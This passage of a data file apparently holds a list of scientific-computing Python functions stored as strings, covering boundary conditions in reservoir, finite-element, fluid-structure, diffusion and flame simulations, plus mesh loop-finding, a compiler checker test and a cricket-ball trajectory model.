= T[i,i] - T[i, i-1]\n elif bc_type_2 == 'dirichlet':\n #Computes the transmissibility of the ith block\n T0 = self.compute_transmissibility(i, i)\n T[i, i] = T[i, i] - T[i, i-1] + 2.0 * T0\n Q[i] = 2.0 * T0 * bc_value_2\n else:\n pass #TODO:Add error checking here if no bc is specified\n\n #If there is no boundary condition compute interblock transmissibilties\n else:\n T[i, i-1] = -self.compute_transmissibility(i, i-1)\n T[i, i+1] = -self.compute_transmissibility(i, i+1)\n T[i, i] = (self.compute_transmissibility(i, i-1) +\n self.compute_transmissibility(i, i+1))\n\n #Compute accumulations\n B[i] = self.compute_accumulation(i)\n\n #If constant-rate wells are present, add them to the flux vector\n if self.rate_well_grids is not None:\n Q[self.rate_well_grids] += self.rate_well_values\n\n \n #Return sparse data-structures\n return (T.tocsr(), \n csr_matrix((B, (np.arange(N), np.arange(N))), shape=(N,N)), \n Q)", "def convergence_check(self):\n air = self.air_alias.val\n flue_gas = self.fuel_alias.val + '_fg'\n fuel = self.fuel_alias.val\n\n for c in self.outl:\n if not c.fluid.val_set[air]:\n if c.fluid.val[air] > 0.95:\n c.fluid.val[air] = 0.95\n if c.fluid.val[air] < 0.5:\n c.fluid.val[air] = 0.5\n\n if not c.fluid.val_set[flue_gas]:\n if c.fluid.val[flue_gas] > 0.5:\n c.fluid.val[flue_gas] = 0.5\n if c.fluid.val[flue_gas] < 0.05:\n c.fluid.val[flue_gas] = 0.05\n\n if not c.fluid.val_set[fuel]:\n if c.fluid.val[fuel] > 0:\n c.fluid.val[fuel] = 0\n\n c.target.propagate_fluid_to_target(c, c.target)\n\n for i in self.inl:\n if i.m.val_SI < 0 and not i.m.val_set:\n i.m.val_SI = 0.01\n\n for c in self.outl:\n if c.m.val_SI < 0 and not c.m.val_set:\n c.m.val_SI = 10\n c.target.propagate_fluid_to_target(c, c.target)\n\n if self.lamb.val < 1 and not self.lamb.is_set:\n self.lamb.val = 2", "def loopVehicle( initPos = (40, 40, 0), theta = 3/2*pi, phi = 0, delta = 0.5, W = 4, alpha = 0):\r\n \r\n initAxis = (cos(theta)*cos(phi), sin(theta)*cos(phi), sin(phi))\r\n vehicle = vs.box(pos=initPos, size=(W,W,0.2), color = clr.green, axis = initAxis,\r\n make_trail=True)\r\n vehicle.trail_object.radius = 0.2\r\n vehicle.velocity = vs.vector(initAxis)\r\n deltat = delta\r\n vscale = 8\r\n varr = vs.arrow(pos=vehicle.pos, axis=vscale*vehicle.velocity, color=clr.yellow)\r\n\r\n while True:\r\n vs.rate(1000)\r\n\r\n orthV = makeHoriVector(theta+pi/2)\r\n orthV2 = makeVector(theta, phi+pi/2)\r\n lSensorPos = tuple(int(x) for x in (vehicle.pos+orthV*W/2).astuple())\r\n rSensorPos = tuple(int(x) for x in (vehicle.pos-orthV*W/2).astuple())\r\n #print(rSensorPos)\r\n\r\n if (getDensity(lSensorPos) > getDensity(rSensorPos)):\r\n theta = theta + pi/180\r\n elif getDensity(lSensorPos) < getDensity(rSensorPos):\r\n theta = theta - pi/180\r\n\r\n if (getDensity(lSensorPos) + getDensity(rSensorPos))/2 > thre_den:\r\n return\r\n\r\n vehicle.velocity = makeVector(theta, phi)\r\n \r\n vehicle.pos = vehicle.pos+vehicle.velocity*deltat*sigmoid(getDensity(lSensorPos)+getDensity(rSensorPos), alpha)\r\n vehicle.axis = vehicle.velocity\r\n vehicle.size=(W,W,0.2)\r\n\r\n varr.pos = vehicle.pos\r\n varr.axis = vehicle.velocity*vscale", "def calculateExteriorElementBoundaryCoefficients(self):\n #\n #get u and grad(u) at the quadrature points\n #\n for ci in range(self.nc):\n self.u[ci].getValuesGlobalExteriorTrace(self.ebqe[('v',ci)],self.ebqe[('u',ci)])\n if self.ebqe.has_key(('grad(u)',ci)):\n self.u[ci].getGradientValuesGlobalExteriorTrace(self.ebqe[('grad(v)',ci)],self.ebqe[('grad(u)',ci)])\n #\n #get coefficients at the 
element boundary quadrature points\n #\n self.coefficients.evaluate(t = self.timeIntegration.t, c = self.ebqe)\n #\n #time integration, handled directly in ELLAM formulation\n #\n #ignore numerical flux for now\n #if self.numericalFlux != None:\n # self.numericalFlux.calculateExteriorNumericalFlux(self.inflowFlag,self.q,self.ebqe)\n #flux boundary conditions specified through advective flux\n for ci,fbcObject in self.fluxBoundaryConditionsObjectsDict.iteritems():\n for t,g in fbcObject.advectiveFluxBoundaryConditionsDict.iteritems():\n self.ebqe[('advectiveFlux_bc',ci)][t[0],t[1]] = g(self.ebqe[('x')][t[0],t[1]],self.timeIntegration.t)\n self.ebqe[('advectiveFlux_bc_flag',ci)][t[0],t[1]] = 1", "def __init__(self, mesh, bndry, interface, dt, theta, v_max, lambda_s, mu_s, rho_s, \n mu_f, rho_f, result, *args, **kwargs):\n\n self.mesh = mesh\n self.dt = Constant(dt)\n self.theta = theta\n self.t = 0.0\n self.v_max = v_max\n\n self.mu_f = mu_f\n self.rho_f = rho_f\n self.lambda_s = lambda_s\n self.mu_s = mu_s\n self.rho_s = rho_s\n \n self.bndry = bndry\n self.interface = interface\n\n # bounding box tree\n self.bb = BoundingBoxTree()\n self.bb.build(self.mesh)\n\n # Define finite elements\n eV = VectorElement(\"CG\", mesh.ufl_cell(), 2)\t\t# velocity element\n eB = VectorElement(\"Bubble\", mesh.ufl_cell(), mesh.geometry().dim()+1) # Bubble element\n eU = VectorElement(\"CG\", mesh.ufl_cell(), 2)\t\t# displacement element\n eP = FiniteElement(\"DG\", mesh.ufl_cell(), 1)\t\t# pressure element\n\n eW = MixedElement([eV, eB, eU, eB, eP]) # final mixed element\n W = FunctionSpace(self.mesh, eW) # mixed space\n self.W = W\n self.V = FunctionSpace(self.mesh, eV)\n\n # Set boundary conditions\n self.v_in = Expression((\"t<2.0? 0.5*(1.0 - cos(0.5*pi*t))*v_max*4/(gW*gW)*(x[1]*(gW - x[1])): \\\n v_max*4/(gW*gW)*(x[1]*(gW - x[1]))\", \"0.0\"),\n degree = 2, v_max = Constant(self.v_max), gW = Constant(gW), t = self.t)\n\n #info(\"Expression set.\")\n bc_v_in = DirichletBC(self.W.sub(0), self.v_in, bndry, _INFLOW)\n bc_v_walls = DirichletBC(self.W.sub(0), Constant((0.0, 0.0)), bndry, _WALLS)\n bc_v_circle = DirichletBC(self.W.sub(0), Constant((0.0, 0.0)), bndry, _CIRCLE)\n bc_u_in = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _INFLOW)\n bc_u_circle = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _CIRCLE)\n bc_u_walls = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _WALLS)\n bc_u_out = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), bndry, _OUTFLOW)\n self.bcs = [bc_v_in, bc_v_walls, bc_v_circle, bc_u_in, bc_u_walls, bc_u_circle, bc_u_out]\n\n #info(\"Mesh BC.\")\n bc_mesh = DirichletBC(self.W.sub(2), Constant((0.0, 0.0)), interface, _FSI)\n self.bcs_mesh = [bc_mesh]\n\n\n #info(\"Normal and Circumradius.\")\n self.n = FacetNormal(self.mesh)\n self.h = Circumradius(self.mesh)\n I = Identity(self.W.mesh().geometry().dim())\n\n # Define functions\n self.w = Function(self.W) # solution to current time step\n self.w0 = Function(self.W) # solution from previous time step\n\n (v__, bv_, u__, bu_, p_) = TestFunctions(self.W)\n\n # sum bubble elements with corresponding Lagrange elements\n v_ = v__ + bv_\n u_ = u__ + bu_\n (v, bv, u, bu, self.p) = split(self.w)\n self.v = v + bv\n self.u = u + bu\n (v0, bv0, u0, bu0, self.p0) = split(self.w0)\n self.v0 = v0 + bv0\n self.u0 = u0 + bu0\n\n\n # define deformation gradient, Jacobian\n self.FF = I + grad(self.u)\n self.FF0 = I + grad(self.u0)\n self.JJ = det(self.FF)\n self.JJ0 = det(self.FF0)\n\n # write ALE mesh movement \n self.gamma 
= 9.0/8.0\n h = CellVolume(self.mesh)**(self.gamma)\n E = Constant(1.0)\n\n E_mesh = E/h\n nu_mesh = Constant(-0.02)\n\n mu_mesh = E_mesh/(2*(1.0+nu_mesh))\n lambda_mesh = (nu_mesh*E_mesh)/((1+nu_mesh)*(1-2*nu_mesh))\n\n F_mesh = inner(mu_mesh*2*sym(grad(self.u)), grad(u_))*dx(0) \\\n + lambda_mesh*inner(div(self.u), div(u_))*dx(0)\n\n\n # define referential Grad and Div shortcuts\n def Grad(f, F): return dot( grad(f), inv(F) )\n def Div(f, F): return tr( Grad(f, F) )\n\n # approximate time derivatives\n du = (1.0/self.dt)*(self.u - self.u0)\n dv = (1.0/self.dt)*(self.v - self.v0)\n\n # compute velocuty part of Cauchy stress tensor for fluid\n self.T_f = -self.p*I + 2*self.mu_f*sym(Grad(self.v, self.FF))\n self.T_f0 = -self.p*I + 2*self.mu_f*sym(Grad(self.v0, self.FF0))\n\n # Compute 1st Piola-Kirhhoff tensro for fluid \n # - for computing surface integrals for forces in postprocessing \n self.S_f = self.JJ *self.T_f*inv(self.FF).T\n \n # write equations for fluid\n a_fluid = inner(self.T_f , Grad(v_, self.FF))*self.JJ*dx(0) \\\n - inner(self.p, Div(v_, self.FF))*self.JJ*dx(0) \\\n + inner(self.rho_f*Grad(self.v, self.FF )*(self.v - du), v_)*self.JJ*dx(0)\n a_fluid0 = inner(self.T_f0, Grad(v_, self.FF0))*self.JJ0*dx(0) \\\n - inner(self.p, Div(v_, self.FF))*self.JJ*dx(0) \\\n + inner(self.rho_f*Grad(self.v0, self.FF0)*(self.v0 - du), v_)*self.JJ0*dx(0)\n\n b_fluid = inner(Div( self.v, self.FF ), p_)*self.JJ*dx(0)\n b_fluid0 = inner(Div( self.v, self.FF ), p_)*self.JJ*dx(0)\n\n self.F_fluid = (self.theta*self.JJ+(1.0 - self.theta)*self.JJ0)*self.rho_f*inner(dv, v_)*dx(0)\\\n + self.theta*(a_fluid + b_fluid) + (1.0 - self.theta)*(a_fluid0 + b_fluid0) \\\n + F_mesh\n\n # compute 1st Piola-Kirchhoff tensor for solid (St. Vennant - Kirchhoff model)\n B_s = self.FF.T *self.FF\n B_s0 = self.FF0.T*self.FF0\n S_s = self.FF *(0.5*self.lambda_s*tr(B_s - I)*I + self.mu_s*(B_s - I))\n S_s0 = self.FF0*(0.5*self.lambda_s*tr(B_s0 - I)*I + self.mu_s*(B_s0 - I))\n\n # write equation for solid\n alpha = Constant(1.0) # Constant(1e10) #\n self.F_solid = rho_s*inner(dv, v_)*dx(1) \\\n + self.theta*inner(S_s , grad(v_))*dx(1) + (1.0 - self.theta)*inner(S_s0, grad(v_))*dx(1) \\\n + alpha*inner(du - (self.theta*self.v + (1.0 - self.theta)*self.v0), u_)*dx(1)\n\n\n dF_solid = derivative(self.F_solid, self.w)\n dF_fluid = derivative(self.F_fluid, self.w)\n\n self.problem = Problem(self.F_fluid, self.F_solid, dF_fluid, dF_solid, self.bcs_mesh, self.bcs)\n self.solver = NewtonSolver()\n\n # configure solver parameters\n self.solver.parameters['relative_tolerance'] = 1e-6\n self.solver.parameters['maximum_iterations'] = 15\n self.solver.parameters['linear_solver'] = 'mumps'\n\n # create files for saving\n if my_rank == 0:\n if not os.path.exists(result):\n os.makedirs(result)\n self.vfile = XDMFFile(\"%s/velocity.xdmf\" % result)\n self.ufile = XDMFFile(\"%s/displacement.xdmf\" % result)\n self.pfile = XDMFFile(\"%s/pressure.xdmf\" % result)\n self.sfile = XDMFFile(\"%s/stress.xdmf\" % result)\n self.vfile.parameters[\"flush_output\"] = True\n self.ufile.parameters[\"flush_output\"] = True\n self.pfile.parameters[\"flush_output\"] = True\n self.sfile.parameters[\"flush_output\"] = True\n with open(result+'/data.csv', 'w') as data_file:\n writer = csv.writer(data_file, delimiter=';', lineterminator='\\n')\n writer.writerow(['time', 'mean pressure on outflow', 'pressure_jump', \n 'x-coordinate of end of beam', 'y-coordinate of end of beam',\n 'pressure difference', \n 'drag_circle', 'drag_fluid', 'drag_solid', 
'drag_fullfluid',\n 'lift_circle', 'lift_fluid', 'lift_solid', 'lift_fullfluid'])", "def run(self):\n cpt = 1\n while cpt < (self.BOUND):\n cpt += 1\n self.incBound()\n\n res = self.s.check()\n if res == sat:\n m = self.s.model()\n self.checkModel(m)\n self.printModel(m)\n return\n else:\n print(\"The problem is UNSAT\")", "def nodal2D_steady_fixed_source(Dims,Lengths,BCs,D,Sigma,Q, tolerance=1.0e-12, phi_solution=0., LOUD=False, maxits=100):\n I = Dims[0]\n J = Dims[1]\n K = Dims[2]\n L = I*J*K\n Nx = Lengths[0]\n Ny = Lengths[1]\n Nz = Lengths[2]\n \n hx,hy,hz = np.array(Lengths)/np.array(Dims)\n ihx2,ihy2,ihz2 = (1.0/hx**2,1.0/hy**2,1.0/hz**2)\n\n if (type(phi_solution) != np.ndarray):\n phi_solution = np.zeros((2,I,J,5))\n phi_new = phi_solution.copy()\n iteration = 1\n converged = 0\n localBCs = np.ones((2,3))\n\n #reshape Q if necessary\n if Q.shape != (I,J,K,5):\n Q_new = np.zeros((I,J,K,5))\n Q_new[:,:,:,0] = Q[:,:,:]\n Q = Q_new\n\n #iterate over the x directions\n k=0\n while not(converged):\n \n #Solve for x direction\n d = 0 #solv direction\n tr_id = 1 #trans direction idx in array\n for j in range(J): #spatial loop over J coordinates\n for i in range(I): #spatial loop over X coordinates\n\n if not(i==0):\n phi_left = phi_solution[d,i-1,j,:]\n C = positive_current(phi_left,hx/2,hx,D[i-1,j,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[0,0:3] = [0.25,-D[i,j,k]/2,C]\n else:\n localBCs[0,:] = BCs[0,:].copy()\n localBCs[0,1] *= D[i,j,k]\n if not(i==(I-1)):\n phi_rt = phi_solution[d,i+1,j,:]\n C = negative_current(phi_rt,-hx/2,hx,D[i+1,j,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[1,0:3] = [.25,D[i,j,k]/2,C]\n else:\n localBCs[1,:] = BCs[1,:].copy()\n localBCs[1,1] *= D[i,j,k]\n \n #Compute transverse fluxes\n if i==0:\n nbr_ids = [i,i,i+1] #Assume constant along left edge\n elif i==(I-1):\n nbr_ids = [i-1,i,i] #assume constant along right edge\n else:\n nbr_ids = [i-1,i,i+1] #interior cell\n\n if not j==(J-1):\n top_phis = phi_solution[tr_id,nbr_ids,j,:]\n top_Ds = D[nbr_ids,j,k]\n Ltop_quad = transverse_leakage_dof(top_phis,hy/2.,hy,hx,top_Ds)\n else:\n top_phis = phi_solution[tr_id,nbr_ids,j,:]\n top_Ds = D[nbr_ids,j,k]\n Ltop_quad = transverse_leakage_dof(top_phis,hy/2.,hy,hx,top_Ds)\n #Ltop_quad = (0., 0, 0)\n\n if not j==0:\n bot_phis = phi_solution[tr_id,nbr_ids,j,:]\n bot_Ds = D[nbr_ids,j,k]\n Lbot_quad = transverse_leakage_dof(bot_phis,-hy/2.,hy,hx,bot_Ds)\n else:\n bot_phis = phi_solution[tr_id,nbr_ids,j,:]\n bot_Ds = D[nbr_ids,j,k]\n Lbot_quad = transverse_leakage_dof(bot_phis,-hy/2.,hy,hx,bot_Ds)\n #Lbot_quad = (0.,0,0)\n\n #Add leakages to the Q_local terms\n# print(\"\\n X Information for element: \",i,j)\n# print(\"\\nThe source is: \",Q[i,j,k,0])\n\n Q_local = np.array(Q[i,j,k,:])\n for dof in range(len(Ltop_quad)):\n Q_local[dof] -= 1/hy*(Ltop_quad[dof] - Lbot_quad[dof])\n\n# print(\"The transverse leakage magnitude is: \",-1./hy*(Ltop_quad[0] - Lbot_quad[0]))\n# print(\"Total RHS: \", Q_local[0], Q_local[1])\n\n #Compute the new x fluxes\n phi_new[0,i,j,:] = single_node1GVacuum(D[i,j,k],Sigma[i,j,k],Q_local,hx,localBCs)\n phi,a1,a2,a3,a4 = phi_new[0,i,j,:]\n# print(\"The reaction magnitude: \", phi_new[0,i,j,0]*Sigma[i,j,k])\n# print(\"The current magnitude: \",1./hx*(current(phi_new[0,i,j,:],hx/2,hx,D[i,j,k]) - current(phi_new[0,i,j,:],-hx/2,hx,D[i,j,k])))\n# print(\"\")\n\n #print(i,\"incoming current on left =\", localBCs[0,2],positive_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i>0):\n print(i,\"outgoing current on left =\", 
negative_current(phi_new[0,i-1,j,:],hx/2,hx,D[i-1,j,k]),\n negative_current(phi_new[0,i,j,:],-hx/2,hx,D[i,j,k]) )\n if 0*(i<I-1):\n print(i,\"outgoing current on right =\", positive_current(phi_new[0,i+1,j,:],-hx/2,hx,D[i+1,j,k]),\n positive_current(phi_new[0,i,j,:],hx/2,hx,D[i,j,k]) )\n #print(i,\"incoming current on right =\", localBCs[1,2],negative_current(phi_new[i,:],h/2,h,D[i]) )\n #print(\"zone \",i,\" current in at right:\",localBCs[1,2],\" current out at right:\",current_left)\n\n \n #Solve for y direction\n d = 1 #solv direction\n tr_id = 0 #trans direction idx in array\n for j in range(J): #spatial loop over J coordinates\n for i in range(I): #spatial loop over X coordinates\n\n if not(j==0):\n phi_left = phi_solution[d,i,j-1,:]\n C = positive_current(phi_left,hy/2,hy,D[i,j-1,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[0,0:3] = [0.25,-D[i,j,k]/2,C]\n else:\n localBCs[0,:] = BCs[2,:].copy()\n localBCs[0,1] *= D[i,j,k]\n if not(j==(J-1)):\n phi_rt = phi_solution[d,i,j+1,:]\n C = negative_current(phi_rt,-hy/2,hy,D[i,j+1,k])\n #print(\"i =\",i,\"Cr =\",C)\n localBCs[1,0:3] = [.25,D[i,j,k]/2,C]\n else:\n localBCs[1,:] = BCs[3,:].copy()\n localBCs[1,1] *= D[i,j,k]\n \n #Compute transverse fluxes\n if j==0:\n nbr_ids = [j,j,j+1] #Assume constant along left edge\n elif j==(J-1):\n nbr_ids = [j-1,j,j] #assume constant along right edge\n else:\n nbr_ids = [j-1,j,j+1] #interior cell\n\n if not i==(I-1):\n rgt_phis = phi_solution[tr_id,i,nbr_ids,:]\n rgt_Ds = D[i,nbr_ids,k]\n Lrgt_quad = transverse_leakage_dof(rgt_phis,hx/2.,hx,hy,rgt_Ds)\n# print(\"Leakage right\",Lrgt_quad)\n# print(\"Just the right leakage\",current(phi_solution[0,i,j,:],hx/2.,hx,D[i,j,k]))\n# print(\"Right outflow, inflow\",positive_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]),\n# negative_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]))\n else:\n rgt_phis = phi_solution[tr_id,i,nbr_ids,:]\n rgt_Ds = D[i,nbr_ids,k]\n Lrgt_quad = transverse_leakage_dof(rgt_phis,hx/2.,hx,hy,rgt_Ds)\n# print(\"Leakage right\",Lrgt_quad)\n# print(\"Just the right leakage\",current(phi_solution[0,i,j,:],hx/2.,hx,D[i,j,k]))\n# print(\"Right outflow, inflow\",positive_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]),\n# negative_current(phi_solution[0,i,j,:],hx/2,hx,D[i,j,k]))\n\n if not i==0:\n lft_phis = phi_solution[tr_id,i,nbr_ids,:]\n lft_Ds = D[i,nbr_ids,k]\n Llft_quad = transverse_leakage_dof(lft_phis,-hx/2.,hx,hy,lft_Ds)\n else:\n lft_phis = phi_solution[tr_id,i,nbr_ids,:]\n lft_Ds = D[i,nbr_ids,k]\n Llft_quad = transverse_leakage_dof(lft_phis,-hx/2.,hx,hy,lft_Ds)\n #Llft_quad = (0.,0,0)\n\n #Add leakages to the Q_local terms\n Q_local = np.array(Q[i,j,k,:])\n# print(\"\\n Y Information for element: \",i,j)\n# print(\"\\nThe source is: \",Q[i,j,k,0])\n for dof in range(len(Lrgt_quad)):\n Q_local[dof] -= 1/hx*(Lrgt_quad[dof] - Llft_quad[dof])\n# print(\"The transverse leakage magnitude is: \",-1./hx*(Lrgt_quad[0] - Llft_quad[0]))\n# print(\"Total RHS: \", Q_local[0], Q_local[1])\n\n phi_new[1,i,j,:] = single_node1GVacuum(D[i,j,k],Sigma[i,j,k],Q_local,hy,localBCs)\n# print(\"The reaction magnitude: \", phi_new[1,i,j,0]*Sigma[i,j,k])\n# print(\"The current magnitude: \",1./hy*(current(phi_new[1,i,j,:],hy/2,hy,D[i,j,k]) - current(phi_new[1,i,j,:],-hy/2,hy,D[i,j,k])))\n# print(\"\")\n phi,a1,a2,a3,a4 = phi_new[1,i,j,:]\n #print(i,\"incoming current on left =\", localBCs[0,2],positive_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i>0):\n print(i,\"outgoing current on left =\", 
negative_current(phi_new[i-1,:],h/2,h,D[i]),negative_current(phi_new[i,:],-h/2,h,D[i]) )\n if 0*(i<I-1):\n print(i,\"outgoing current on right =\", positive_current(phi_new[i+1,:],-h/2,h,D[i]),positive_current(phi_new[i,:],h/2,h,D[i]) )\n #print(i,\"incoming current on right =\", localBCs[1,2],negative_current(phi_new[i,:],h/2,h,D[i]) )\n #print(\"zone \",i,\" current in at right:\",localBCs[1,2],\" current out at right:\",current_left)\n\n# print(\"X solution\", phi_new[0,:,:,0])\n# print(\"Y solution\", phi_new[1,:,:,0])\n\n #Compute total change in x and y\n relchange = np.linalg.norm( np.reshape(phi_new-phi_solution, 5*I*J*K*2))/np.linalg.norm( np.reshape(phi_new, 5*I*J*K*2))\n reldiff = np.linalg.norm( np.reshape(phi_new[0,:,:,0] - phi_new[1,:,:,0], I*J*K)/np.linalg.norm( np.reshape(phi_new[0,:,:,0],I*J*K)) )\n converged = (relchange < tolerance) or (iteration >= maxits)\n if (LOUD):\n print(\"Iteration\",iteration,\": relative change total =\",relchange,\"relative difference X Y\",reldiff)\n iteration += 1 \n phi_solution = phi_new.copy()\n\n\n x = np.linspace(hx*.5,Nx-hx*.5,I)\n y = np.linspace(hy*.5,Ny-hy*.5,J)\n z = np.linspace(hz*.5,Nz-hz*.5,K)\n return x,y,z,phi_solution[0,:,:,0].reshape(I,J,1)#+phi_solution[1,:,:,0].reshape(I,J,1)))", "def find_loops(edges):\n check_regularity(edges)\n loops = []\n edges = edges[:]\n start_i = -1\n last_i = -1\n n = []\n while edges != []:\n if start_i == -1:\n e = edges[0]\n n = [e]\n del edges[0]\n start_i = n[-1][0]\n last_i = n[-1][1]\n else:\n ok = False\n for i, e in enumerate(edges):\n if e[0] == last_i:\n n.append(e)\n del edges[i]\n ok = True\n break\n elif e[1] == last_i:\n n.append((e[1], e[0]))\n del edges[i]\n ok = True\n break\n if not ok:\n if start_i == last_i:\n start_i = -1\n loops.append(n)\n else:\n raise Exception(\"Missing some boundary edge\")\n last_i = n[-1][1]\n if start_i == last_i:\n loops.append(n)\n else:\n raise Exception(\"Missing some boundary edge\")\n return loops", "def test_74_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} break; end{while} break; end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,474))", "def boundary_conditions(self):\n pass", "def check_boundary(self,x):\n b_cells = np.zeros(self.n_c)\n b_cells[self.n_C:] = 1\n vBC = b_cells[self.tris]\n considered_triangles = vBC.sum(axis=1) == 2\n add_extra = ((self.Angles*(1-vBC)>np.pi/2).T*considered_triangles.T).T\n if add_extra.any():\n I,J = np.nonzero(add_extra)\n for k,i in enumerate(I):\n j = J[k]\n xs = x[self.tris[i]]\n re = xs[np.mod(j-1,3)] - xs[np.mod(j+1,3)]\n re = re/np.linalg.norm(re)\n re = np.array([re[1],-re[0]])\n rpe = xs[j]\n x_new = 2*np.dot(xs[np.mod(j-1,3)]-rpe,re)*re + rpe\n x = np.vstack((x,x_new))\n self.n_c = x.shape[0]\n self._triangulate(x)\n self.assign_vertices()\n\n C = get_C_boundary(self.n_c,self.CV_matrix)\n #\n # #Remove extra cells\n # keep_mask = C[self.n_C:, :self.n_C].sum(axis=1)>0 #I'm assuming this is the same thing. 
This removes all boundary centroids that are not connected to at least one real centroid.\n # if keep_mask.any():\n # c_keep = np.nonzero(keep_mask)[0]\n # x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n # self.n_c = x.shape[0]\n # self._triangulate(x)\n # self.assign_vertices()\n #\n\n #Remove all boundary particles not connected to exactly two other boundary particles\n remove_mask = C[self.n_C:, self.n_C:].sum(axis=1)!=2\n if remove_mask.any():\n c_keep = np.nonzero(~remove_mask)[0]\n x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n self.n_c = x.shape[0]\n self._triangulate(x)\n self.assign_vertices()\n self.Angles = tri_angles(x, self.tris)\n #\n # remove_mask = C[self.n_C:, self.n_C:].sum(axis=1)==0\n # if remove_mask.any():\n # c_keep = np.nonzero(~remove_mask)[0]\n # x = np.concatenate((x[:self.n_C],x[c_keep + self.n_C]))\n # self.n_c = x.shape[0]\n # self._triangulate(x)\n # self.assign_vertices()\n # self.Angles = tri_angles(x, self.tris)\n\n\n return x", "def conditions():\n pass", "def before_bounce(vx_0,vy_0,vz_0,wx,wy,wz):\r\n # We define all the constants that we need to use\r\n g = 32.2 # gravitational constant in ft/ sec^2 \r\n radius = 0.116 # of the cricket ball in ft\r\n\r\n # We use the following two constants to calculate the value of constant_1\r\n #weight = 0.344 lb\r\n #ro = 0.075 lb/ft**2\r\n constant = 0.00461 # ro*area/(2*m)\r\n\r\n # C_d and C_l are constants for calculating the values of k_D and k_L\r\n c_d = 0.4\r\n c_l = 0.116\r\n k_d = c_d * constant # (c_d*ro*area)/(2*m)\r\n k_l = c_l * constant # (c_l*ro*area)/(2*m)\r\n \r\n # the initial and final time\r\n t_0 = 0.0 #s\r\n t_f = 3.0\r\n\r\n # number of steps and value of h \r\n N = 1000\r\n h = (t_f-t_0)/N\r\n\r\n e = 0.32 # coefficient of restitution\r\n c = 0.1 # constant for moisture level in the ground ranging from 0 to 1\r\n eps = 10E-2 # error constant\r\n \r\n # the values of the initial position of the ball and its \r\n # x, y and z components\r\n x_0 = 1 #ft\r\n y_0 = 2 #ft\r\n z_0 = 7 #ft\r\n\r\n def f(r,t):\r\n \"\"\"\r\n Helper function for using the fourth-order Runge Kutta (RK-4) method on the \r\n second order differential equations which help plot the ball's trajectory in its\r\n x, y and z axes.\r\n \"\"\"\r\n x = r[0]\r\n y = r[2]\r\n z = r[4]\r\n vx = r[1]\r\n vy = r[3]\r\n vz = r[5]\r\n velocity = np.sqrt(vx**2+vy**2+vz**2)\r\n #if np.abs(z)>eps:\r\n velocity = np.sqrt((vx+c*radius*wy)**2+(vy-c*radius*wx)**2+(-e*vz)**2)\r\n \r\n # equations for a cricket ball in motion\r\n return np.array([vx, (-k_d*velocity*vx+k_l*(wy*vz-wz*vy)),\r\n vy, (-k_d*velocity*vy+k_l*(wz*vx-wx*vz)),\r\n vz,(-k_d*velocity*vz+k_l*(wz*vy-wy*vx)-g)], float)\r\n \r\n t_before = np.arange(t_0, t_f, h) #array of time \r\n x_before = [] \r\n y_before = []\r\n z_before = []\r\n r_before = np.array([x_0, vx_0, y_0, vy_0, z_0, vz_0], float)\r\n \r\n # Applies RK-4 for each value of the position and velocity components\r\n for t in t_before:\r\n if np.abs(r_before[4])>=eps and r_before[0] <= (60+eps): \r\n x_before.append(r_before[0])\r\n y_before.append(r_before[2])\r\n z_before.append(r_before[4])\r\n k1 = h * f(r_before, t)\r\n k2 = h * f(r_before + 0.5 * k1, t + 0.5 * h)\r\n k3 = h * f(r_before + 0.5 * k2, t + 0.5 * h)\r\n k4 = h * f(r_before + k3, t + h)\r\n r_before += (k1 + 2 * k2 + 2 * k3 + k4) / 6\r\n # sets the initial component values for after the bounce when z is 0\r\n x_f = r_before[0]\r\n y_f = r_before[2]\r\n z_f = r_before[4]\r\n vx_f = r_before[1]\r\n vy_f = r_before[3]\r\n vz_f = 
r_before[5]\r\n \r\n # Makes a 3-D plot of the x, y and z axes representing the ball before hitting\r\n # the ground\r\n plt.figure(1)\r\n plot1 = plt.axes(projection=\"3d\")\r\n plot1.plot3D(x_before,y_before,z_before,'blue')\r\n plot1.set_xlabel('x')\r\n plot1.set_ylabel('y')\r\n plot1.set_zlabel('z')\r\n plot1.set_title('Before Bounce')\r\n \r\n return x_f,y_f,z_f,vx_f,vy_f,vz_f,x_before,y_before,z_before", "def main():\n\n varList = {'beta': 6., 'convSpeed': 1.2, 'Mark': 0., 'axi': 1, 'acModes': 4, 'Nr': 801, 'Tf': 600., 'xf': 0.51}\n\n # Solve steady flame.\n # BC1: I have the attachment BC at r = 1, always\n # BC2: I need to set dF/dr = 0 at r = 0 iff Mark != 0\n [qMean, r, FMean] = steady_flame_area_FD3(varList['Mark'], varList['beta'], varList['axi'], varList['Nr'])\n r = r * varList['beta']\n\n # Calculate mean flame derivatives\n dFMeanDr = derivsnew.FD1_CT2_D(FMean, r[1] - r[0])\n d2FMeanDr2 = derivsnew.FD2_CT2_D(FMean, r[1] - r[0])\n\n #Apply BC smooth tip:\n if(varList['Mark']!=0.0):\n dFMeanDr[-1] = 0.0\n\n # Use correct number of points. Remember that the extrems need to be set depending on the BC!\n # The attach BC (first point) is always assumed to be true and removed from the vector list\n if(varList['Mark']==0):\n Nr = varList['Nr'] / 2\n dFMeanDr = dFMeanDr[1:]\n d2FMeanDr2 = d2FMeanDr2[1:]\n r = r[1:]\n # The smooth BC holds only if Mark!=0 (second derivatives appear): remove also the last point\n else:\n Nr = varList['Nr'] / 2 - 1\n dFMeanDr = dFMeanDr[1:-1]\n d2FMeanDr2 = d2FMeanDr2[1:-1]\n r = r[1:-1]\n\n # Calculate geometric values\n den = 1 + varList['beta'] * varList['beta'] * dFMeanDr * dFMeanDr\n dR = r[1] 